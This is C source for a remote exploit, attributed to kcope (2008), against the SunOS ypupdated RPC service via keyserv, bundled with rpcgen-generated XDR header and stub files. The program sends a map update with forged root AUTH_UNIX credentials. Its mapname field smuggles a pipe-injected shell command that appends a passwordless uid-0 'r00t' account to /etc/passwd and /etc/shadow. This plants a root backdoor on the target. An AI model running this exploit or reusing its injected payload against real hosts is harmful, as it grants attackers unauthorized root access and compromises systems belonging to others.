/*update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES) If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV) it executes a shell through which extra commands may be launched on the remote host by passing '|shell command'. i.e. the COMM variable contains a pipe character after which a command may be passed. You may change the command by changing this. */ #include #include #include #include #include #include #include #include #include #include #define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255 typedef struct{ unsigned int yp_buf_len; char * yp_buf_val; } yp_buf; struct ypupdate_args{ char * mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args; #ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *); #else bool_t xdr_ypupdate_args(); #endif void main(argc, argv) int argc; char *argv[]; { CLIENT * cli; unsigned long prog=100028; unsigned int vers=1; struct sockaddr_in skn; struct timeval timeVal; struct hostent * hostEnt; ypupdate_args ypArg; unsigned long rtnval; unsigned int desc; char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >> /etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;"; if(argc<2) { printf("example: yxp target\n"); exit(1); } timeVal.tv_usec=0; timeVal.tv_sec=15; desc=RPC_ANYSOCK; ypArg.datum.yp_buf_val="x"; ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1; ypArg.key.yp_buf_val="x"; ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1; ypArg.mapname=comm; if ((hostEnt=gethostbyname(argv[1]))==NULL){ printf("gethostbyname failure\n"); exit(1); } skn.sin_family=AF_INET;skn.sin_port=htons(0); bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4); if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){ printf("clntudp_create failure\n"); exit(1); } cli->cl_auth=authunix_create("localhost",0,0,0,0); clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal); } ypupdate_prot.h: /* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _YPUPDATE_PROT_H_RPCGEN #define _YPUPDATE_PROT_H_RPCGEN #include /* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */ /* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */ #define MAXMAPNAMELEN 255 #define MAXYPDATALEN 1023 #define MAXERRMSGLEN 255 typedef struct { u_int yp_buf_len; char *yp_buf_val; } yp_buf; #ifdef __cplusplus extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*); #elif __STDC__ extern bool_t xdr_yp_buf(XDR *, yp_buf*); #else /* Old Style C */ bool_t xdr_yp_buf(); #endif /* Old Style C */ struct ypupdate_args { char *mapname; yp_buf key; yp_buf datum; }; typedef struct ypupdate_args ypupdate_args; #ifdef __cplusplus extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #elif __STDC__ extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*); #else /* Old Style C */ bool_t xdr_ypupdate_args(); #endif /* Old Style C */ struct ypdelete_args { char *mapname; yp_buf key; }; typedef struct ypdelete_args ypdelete_args; #ifdef __cplusplus extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #elif __STDC__ extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*); #else /* Old Style C */ bool_t xdr_ypdelete_args(); #endif /* Old Style C */ #define YPU_PROG ((u_long)100028) #define YPU_VERS ((u_long)1) #ifdef __cplusplus #define YPU_CHANGE ((u_long)1) extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *); #elif __STDC__ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(ypupdate_args *, CLIENT *); extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *); extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *); extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(ypupdate_args *, CLIENT *); extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *); #else /* Old Style C */ #define YPU_CHANGE ((u_long)1) extern u_int * ypu_change_1(); extern u_int * ypu_change_1_svc(); #define YPU_INSERT ((u_long)2) extern u_int * ypu_insert_1(); extern u_int * ypu_insert_1_svc(); #define YPU_DELETE ((u_long)3) extern u_int * ypu_delete_1(); extern u_int * ypu_delete_1_svc(); #define YPU_STORE ((u_long)4) extern u_int * ypu_store_1(); extern u_int * ypu_store_1_svc(); #endif /* Old Style C */ #endif /* !_YPUPDATE_PROT_H_RPCGEN */ ypupdate_prot_xdr.c: /* * Please do not edit this file. * It was generated using rpcgen. */ #include "ypupdate_prot.h" /* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */ /* * Compiled from ypupdate_prot.x using rpcgen * This is NOT source code! * DO NOT EDIT THIS FILE! */ bool_t xdr_yp_buf(XDR *xdrs, yp_buf *objp) { register long *buf; if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int *)&objp->yp_buf_len, MAXYPDATALEN)) { return (FALSE); } return (TRUE); } bool_t xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp) { register long *buf; if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->datum)) { return (FALSE); } return (TRUE); } bool_t xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp) { register long *buf; if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) { return (FALSE); } if (!xdr_yp_buf(xdrs, &objp->key)) { return (FALSE); } return (TRUE); }